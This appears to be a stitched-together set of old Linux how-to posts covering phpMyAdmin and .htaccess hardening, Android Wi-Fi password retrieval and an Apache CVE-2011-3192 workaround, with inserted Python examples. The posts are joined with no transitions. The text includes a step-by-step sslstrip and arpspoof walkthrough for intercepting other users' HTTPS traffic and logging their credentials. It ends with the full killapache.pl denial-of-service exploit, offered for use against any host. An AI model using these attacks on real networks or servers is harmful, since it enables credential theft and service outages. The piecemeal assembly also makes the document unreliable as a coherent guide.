These instructions were performed on an Ubuntu 11.10 machine via SSH.
So, I was messing around with phpMyAdmin and noticed the directory
/usr/share/phpmyadmin/setup.  I browse to
http://mydomainname.com/phpmyadmin/setup
and it immediately asks for credentials to log in.  First, phpMyAdmin
has already been set up...why leave the setup directory on the server
when it's not needed?

I then delete the setup folder from /usr/share/phpmyadmin/setup
sudo rm -rf /usr/share/phpmyadmin/setup

Now, by default you can simply just access the web interface of
phpMyAdmin by browsing to http://mydomainname.com/phpmyadmin
I want this directory on my server to have an extra layer of
protection.  I know that you have to login to the phpMyAdmin interface
first, but I'm a security conscious guy.  Why not have more security
added when you can?

We will take a look at the phpMyAdmin default Apache configuration file.
I browse to the directory /etc/phpmyadmin and take a look at the file
apache.conf

Here is the output of apache.conf:
# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
    Options FollowSymLinks
    DirectoryIndex index.php

    <IfModule mod_php5.c>
        AddType application/x-httpd-php .php

        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_admin_flag allow_url_fopen Off
        php_value include_path .
        php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
        php_admin_value open_basedir /usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/
    </IfModule>

</Directory>

# Authorize for setup
<Directory /usr/share/phpmyadmin/setup>
    <IfModule mod_authn_file.c>
    AuthType Basic
    AuthName "phpMyAdmin Setup"
    AuthUserFile /etc/phpmyadmin/htpasswd.setup
    </IfModule>
    Require valid-user
</Directory>

# Disallow web access to directories that don't need it
<Directory /usr/share/phpmyadmin/libraries>
    Order Deny,Allow
    Deny from All
</Directory>
<Directory /usr/share/phpmyadmin/setup/lib>
    Order Deny,Allow
    Deny from All
</Directory>

Ok, so what I'm going to try and accomplish here is add Basic authentication
to the /usr/share/phpmyadmin directory block using the module
"mod_authn_file.c" (this is like adding a .htaccess file into the
/usr/share/phpmyadmin directory).

Here is my edited /etc/phpmyadmin/apache.conf file:
Note: the lines I added start just below "DirectoryIndex index.php".
The line "AuthUserFile /data/user-access/.htpasswd" points at the
.htpasswd file I already use for my .htaccess files.  If you want to
see how this works and is set up, check out the article here:
https://codersresource.com/linux/web-server/controlling-directory-access-with-an-htaccess-file
I also commented out all the lines under the "Authorize for setup" section
(no need for it now that the setup directory is gone).

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
    Options FollowSymLinks
    DirectoryIndex index.php

    <IfModule mod_authn_file.c>
    AuthType Basic
    AuthName "Restricted Access!"
    AuthUserFile /data/user-access/.htpasswd
    </IfModule>
    Require valid-user

    <IfModule mod_php5.c>
        AddType application/x-httpd-php .php

        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_admin_flag allow_url_fopen Off
        php_value include_path .
        php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
        php_admin_value open_basedir /usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/
    </IfModule>

</Directory>

# Authorize for setup
# <Directory /usr/share/phpmyadmin/setup>
#    <IfModule mod_authn_file.c>
#    AuthType Basic
#    AuthName "phpMyAdmin Setup"
#    AuthUserFile /etc/phpmyadmin/htpasswd.setup
#    </IfModule>
#
#    Require valid-user
# </Directory>

# Disallow web access to directories that don't need it
<Directory /usr/share/phpmyadmin/libraries>
    Order Deny,Allow
    Deny from All
</Directory>
<Directory /usr/share/phpmyadmin/setup/lib>
    Order Deny,Allow
    Deny from All
</Directory>

After you have made the changes above, save the file.  Then restart Apache:
sudo /etc/init.d/apache2 restart

Now if you browse to http://mydomainname.com/phpmyadmin Apache will
prompt you for a username and password...just an extra layer of
security ;)

A very quick and easy way to control directory access is to create an .htaccess file.  The .htaccess file contains information to require valid user credentials to access whatever directory you put your .htaccess file in.

First, we have to create the .htpasswd file.  This file contains the username and hash of the password.

Example output of the .htpasswd file would look like this:

user:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user2:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.
user3:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.

To create the file run this command:
sudo htpasswd -c .htpasswd <username>
It will ask you for a password.

To add users to an existing .htpasswd file:
sudo htpasswd .htpasswd <username>
Again, it will ask you for a password.

I usually create a directory called user-access outside my document root (where my web sites are stored).
In my case the document root is located at /data/www, so I will create the directory user-access in /data.

Run this command:
sudo mkdir /data/user-access

Ok.  Remember above when we created the .htpasswd file?  Move it to the new directory you just created /data/user-access
If I had created the file in my home directory it would be something like this:
sudo mv /home/user/.htpasswd /data/user-access

Now we are going to create the .htaccess file.  I want to restrict users from accessing a download directory on my server.
The directory in question is:
/data/www/downloads

I'm going to change to this directory and create the .htaccess file:
cd /data/www/downloads

Create the .htaccess file:
sudo vi .htaccess

Here is an example of what mine looks like:

AuthUserFile /data/user-access/.htpasswd
AuthName "Restricted Access - Valid User Credentials Required"
AuthType Basic

Require valid-user
Order allow,deny
Satisfy any

The line AuthUserFile /data/user-access/.htpasswd tells Apache where to look for the .htpasswd file we created
earlier.  It won't work if you don't set this file path correctly.

The line AuthName "Restricted Access - Valid User Credentials Required" sets the text of the login prompt; anything wrapped in quotes can be changed to whatever you decide.

The line Require valid-user simply says it will accept any user you created with the .htpasswd file.  If you want to restrict it to just a single user, you can change that line to Require user <username> (without brackets).

Restart Apache (this command will differ depending on the particular Linux distribution you have installed):
sudo /etc/init.d/apache2 restart

You can use this .htaccess file to pretty much control access to any web directory now.  No need to modify anything in it, just move it to whatever directory you want to control access to.
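As an added example (not part of this article or of Apache's htpasswd tool), here is what an $apr1$ line in the .htpasswd file actually encodes, which applies equally to the AuthUserFile line in the phpMyAdmin apache.conf above and to the .htaccess setup here: a standard-library Python implementation of Apache's apr1 MD5-crypt that parses a .htpasswd file and verifies a password against it. The salt ROvNIWjo is the one shown above; the passwords and the sample file are constructed.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt-style base64: emit `count` chars, least significant 6 bits first."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def apr1_hash(password, salt):
    """Apache's $apr1$ scheme: MD5-crypt with the magic string '$apr1$'."""
    pw, salt, magic = password.encode(), salt.encode()[:8], b"$apr1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:                       # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                           # one byte per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):              # fixed 1000 stretching rounds
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final                          # 16 bytes, emitted in a fixed permutation
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((f[a] << 16) | (f[b] << 8) | f[c], 4) for a, b, c in groups)
    return "$apr1$" + salt.decode() + "$" + enc + _to64(f[11], 2)


def parse_htpasswd(text):
    """Map user -> stored hash for every 'user:hash' line (comments skipped)."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and ":" in line:
            user, stored = line.split(":", 1)
            users[user] = stored
    return users


def check_credentials(htpasswd_text, user, password):
    """True only if `user` exists and `password` matches its $apr1$ entry."""
    stored = parse_htpasswd(htpasswd_text).get(user)
    if stored is None or not stored.startswith("$apr1$"):
        return False               # unknown user, or a scheme this example skips
    salt = stored.split("$")[2]    # layout is "$apr1$<salt>$<hash>"
    return hmac.compare_digest(apr1_hash(password, salt), stored)


# Constructed sample .htpasswd: hashes made with apr1_hash so it runs offline.
SAMPLE_HTPASSWD = "\n".join([
    "user:" + apr1_hash("example-pass", "ROvNIWjo"),
    "user2:" + apr1_hash("another-pass", "ROvNIWjo"),
])
```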

First thing you need to do is go to the Android Market and download an app called "SSHDroid".

Go ahead and install this app and run the program on your Android device.

Once the program is running you can modify options by going into  "Options".  There isn't a whole lot you need to modify here, but I do recommend changing the password.  If you don't decide to change it, the default password is "admin".

Ok, now that you have the program running, you'll notice which IP address SSHDroid is listening on.  In my case it's 10.10.1.12.  I use a program called "Filezilla" (http://filezilla-project.org) to SFTP into my Android device.  You can use any client that supports the SFTP protocol.  If you're reading this article and are fairly technically savvy, you already know what an FTP/SFTP client is.

Connecting to the Android device via your FTP/SFTP client:
Host: Your local IP address SSHDroid is listening on
Protocol: SFTP - SSH File Transfer Protocol
Logon type: Normal
User: root
Password: This will be the password you changed in the "Options" settings of SSHDroid.  If you didn't change the password, default is: admin


Go ahead and make the connection to your Android device.  Browse to:
/data/misc/wifi

and download the file "wpa_supplicant.conf"


Here is what the file should look like (the SSIDs and passwords are
in plain text, so I omitted them with X's):

ctrl_interface=eth0
update_config=1

network={
ssid="XXXXXXXXXXXXX-XXXX"
psk="XXXXXXXXXXXXXX"
}

network={
ssid="XXX-XXXXX"
psk="XXXXXXXXXXX"
priority=1
}

network={
ssid="XXXXXXX"
key_mgmt=NONE
priority=2
}

network={
ssid="XXXXXXXXXX"
psk="XXXXXXXXX"
priority=3
}

network={
ssid="XXXXX_XXXXXX"
psk="XXXXXXXXXXXXXXX"
priority=4
}

network={
ssid="XXXXXX_XXXXXXXX_XXXXXXXX_XXXXXX"
key_mgmt=NONE
priority=5
}

network={
ssid="XXXXXXXX"
key_mgmt=NONE
priority=6
}

network={
ssid="XXXXX"
key_mgmt=NONE
priority=7
}

network={
ssid="XXXXXXXXXX"
key_mgmt=NONE
priority=8
}

network={
ssid="XX XXXXXX"
key_mgmt=NONE
priority=9
}

network={
ssid="XXX.XXXXX"
key_mgmt=NONE
priority=10
}

network={
ssid="XXXXXXX XXXXXX XXX"
psk="XXXXXXXXXXXX"
priority=11
}


So if you forget your saved passwords, you can use this little trick.  It also works if you want to modify the passwords.
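Added example (not part of this article): a small Python parser for the network={...} blocks of a wpa_supplicant.conf export like the one above, used to audit which saved networks are open and which store a passphrase in the clear, without printing any secret. The sample configuration text is constructed in the same layout as the file shown.

```python
import re

# Constructed sample in the layout of the file above (no real networks).
SAMPLE_CONF = """ctrl_interface=eth0
update_config=1

network={
ssid="HomeNet"
psk="constructed-passphrase"
}

network={
ssid="Coffee Shop"
key_mgmt=NONE
priority=2
}

network={
ssid="Office"
psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
priority=3
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
HEX_PSK_RE = re.compile(r"[0-9a-fA-F]{64}")


def parse_networks(text):
    """One dict per network={} block; values kept raw (quotes preserved)."""
    networks = []
    for body in BLOCK_RE.findall(text):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                entry[key.strip()] = value.strip()
        networks.append(entry)
    return networks


def classify(net):
    """'open', 'psk-plaintext' (quoted passphrase), 'psk-hex' (derived key)."""
    psk = net.get("psk", "")
    if net.get("key_mgmt") == "NONE":
        return "open"
    if psk.startswith('"'):        # wpa_supplicant quotes ASCII passphrases
        return "psk-plaintext"
    if HEX_PSK_RE.fullmatch(psk):  # 256-bit PSK, not the passphrase itself
        return "psk-hex"
    return "unknown"


def audit_networks(text):
    """(ssid, priority, kind) per network, highest priority first."""
    report = [(net.get("ssid", "").strip('"'), int(net.get("priority", 0)), classify(net))
              for net in parse_networks(text)]
    return sorted(report, key=lambda r: -r[1])
```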

Have Fun!
This tutorial will show you how to set up sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Aren't you excited?!

Open a terminal window

Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11--  http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'

100%[====================================================================================>] 22,198      --.-K/s   in 0.07s

2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT

Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT

You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web


In my case they were already installed:

#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT


Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9

#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING  lock.ico  README  setup.py  sslstrip  sslstrip.py
#END TERMINAL OUTPUT

Run the command:
python ./setup.py install

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT


Now we need to turn on IP forwarding, run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward


Ok, iptables has to be set up to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Change the <listenPort> above to an ephemeral port.  Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000

Now we are going to execute sslstrip, run this command:
sslstrip -a -l 30000 -w secret.log

The listening port will be whatever you chose for iptables to redirect HTTP traffic to.

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log

sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT

Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!

Open a new terminal window.

Now we need to set up arpspoof so the network will think you are the gateway or router.  This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

If you don't know your interface name, just run a quick "ifconfig"
command and it will list it.  The <gatewayIP> is the network's real
gateway/router; this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>

So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254

#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
#END TERMINAL OUTPUT

Notice above in the terminal output, you will constantly receive arp
replies, just let it run.  Don't kill the terminal session.
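The flip side, as an added example that is not part of this tutorial: the replies arpspoof sends are visible to anyone capturing ARP on the same segment, so a defender can spot them by checking each "is-at" claim against a known IP-to-MAC table and against what the capture has already seen. This Python snippet parses lines in the one-line format shown in the terminal output above; the sample lines and the KNOWN_BINDINGS gateway MAC are constructed.

```python
import re

# One-line form arpspoof/tcpdump print: "<src> <dst> 0806 <len>: arp reply <ip> is-at <mac>"
ARP_REPLY_RE = re.compile(
    r"^(?P<src_mac>[0-9a-f:]+) (?P<dst_mac>[0-9a-f:]+) 0806 \d+: "
    r"arp reply (?P<ip>\d+(?:\.\d+){3}) is-at (?P<claimed_mac>[0-9a-f:]+)$",
    re.I,
)

# Constructed: the gateway's real MAC as recorded from the switch or DHCP server.
KNOWN_BINDINGS = {"10.10.1.254": "00:11:22:33:44:55"}

# Constructed capture: two spoofed gateway replies, then a host whose MAC "changes".
SAMPLE_LINES = [
    "0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79",
    "0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79",
    "0:11:22:33:44:66 0:c:29:39:6c:79 0806 42: arp reply 10.10.1.20 is-at 0:11:22:33:44:66",
    "0:c:29:39:6c:79 0:11:22:33:44:66 0806 42: arp reply 10.10.1.20 is-at 0:c:29:39:6c:79",
    "some unrelated line that is not an ARP reply",
]


def normalize_mac(mac):
    """Zero-pad octets so '0:c:29:39:6c:79' and '00:0c:29:39:6c:79' compare equal."""
    return ":".join(part.zfill(2).lower() for part in mac.split(":"))


def parse_arp_reply(line):
    """Dict with src_mac, dst_mac, ip, claimed_mac, or None for non-reply lines."""
    m = ARP_REPLY_RE.match(line.strip())
    if not m:
        return None
    return {k: normalize_mac(v) if k.endswith("mac") else v for k, v in m.groupdict().items()}


def find_spoofed_replies(lines, known=KNOWN_BINDINGS):
    """Return (ip, claimed_mac, reason) once per suspicious IP/MAC pair.

    Two rules: a claim that contradicts a known binding, and an IP whose MAC
    changes part-way through the capture. Both are what an ARP spoofer produces;
    a legitimate NIC swap also trips the second rule, so treat hits as alerts to
    investigate rather than proof.
    """
    alerts, seen, reported = [], {}, set()
    for line in lines:
        reply = parse_arp_reply(line)
        if reply is None:
            continue
        ip, mac = reply["ip"], reply["claimed_mac"]
        reason = None
        if ip in known and known[ip] != mac:
            reason = "conflicts with known binding"
        elif seen.get(ip, mac) != mac:
            reason = "binding changed during capture"
        seen.setdefault(ip, mac)
        if reason and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append((ip, mac, reason))
    return alerts
```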

If you need additional help just run:
sslstrip --help

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.
#END TERMINAL OUTPUT


That's it...have fun!
There is a nasty little bug out there that affects Apache's byterange filter.  The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges.

More information here:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192

Luckily there is a workaround for this.  First, see if you have mod_headers installed:
locate mod_headers

#BEGIN TERMINAL OUTPUT
[root@apollo ~]# locate mod_headers
/_restore/102810/usr/lib/httpd/modules/mod_headers.so
/usr/lib/httpd/modules/mod_headers.so
#END TERMINAL OUTPUT

Now, we need to add a few lines to the httpd.conf file.  Mine is located at:
vi /etc/httpd/conf/httpd.conf

Look for this line:
LoadModule headers_module modules/mod_headers.so

Insert this code under "LoadModule headers_module modules/mod_headers.so":
<IfModule mod_headers.c>
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (?:,.*?){5,5} bad-range=1
RequestHeader unset Range env=bad-range
# We always drop Request-Range; as this is a legacy
# dating back to MSIE3 and Netscape 2 and 3.
RequestHeader unset Request-Range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
CustomLog logs/range-CVE-2011-3192.log common env=bad-req-range
</IfModule>


The block we added above drops the Range header from any request that carries more than five ranges (the pattern matches five commas) and, through the env=bad-range condition on CustomLog, logs those requests.  It also unsets Request-Range on every request.  Note that the second CustomLog line refers to an environment variable, bad-req-range, that nothing in this block sets, so it never writes anything; it is harmless and can be left out.

Just restart Apache for the settings to take effect:
/etc/init.d/httpd restart
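Added example (not part of the article or of Apache): the SetEnvIf test from the workaround above, reproduced in Python so you can check exactly which Range headers it drops and which it lets through; note that the pattern counts commas, not well-formed ranges. The sample headers are constructed.

```python
import re

# Apache's pattern from the workaround: five commas in the header value,
# i.e. six or more byte ranges. It counts commas, not well-formed ranges.
BAD_RANGE_RE = re.compile(r"(?:,.*?){5,5}")

# Constructed examples: a normal resume request, a five-range request (kept)
# and a header shaped like the abusive one (more than five ranges, dropped).
SAMPLE_HEADERS = {
    "resume": "bytes=1000-",
    "five": "bytes=0-,5-0,5-1,5-2,5-3",
    "six": "bytes=0-,5-0,5-1,5-2,5-3,5-4",
}


def count_ranges(range_header):
    """Number of non-empty comma-separated range specs after 'bytes='."""
    spec = range_header.partition("=")[2]
    return sum(1 for part in spec.split(",") if part.strip())


def should_drop_range(range_header):
    """True when the SetEnvIf line would set bad-range=1 for this value."""
    return BAD_RANGE_RE.search(range_header) is not None


def apply_workaround(headers):
    """Mirror the <IfModule mod_headers.c> block on a dict of request headers.

    Returns (filtered_headers, logged): Range is removed and the request is
    flagged for range-CVE-2011-3192.log when bad-range would be set;
    Request-Range is always removed.
    """
    out = {}
    logged = False
    for name, value in headers.items():
        lname = name.lower()
        if lname == "request-range":
            continue                 # legacy MSIE3/Netscape header, unset unconditionally
        if lname == "range" and should_drop_range(value):
            logged = True            # env=bad-range -> CustomLog entry
            continue
        out[name] = value
    return out, logged
```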

Here is the exploit code if you want to play around with it, just save it to a .pl file:

#BEGIN EXPLOIT CODE
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl <host> [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost:
$ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection:
close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
#END EXPLOIT CODE

This will take down a box within a matter of minutes, if not, seconds.
Have fun!
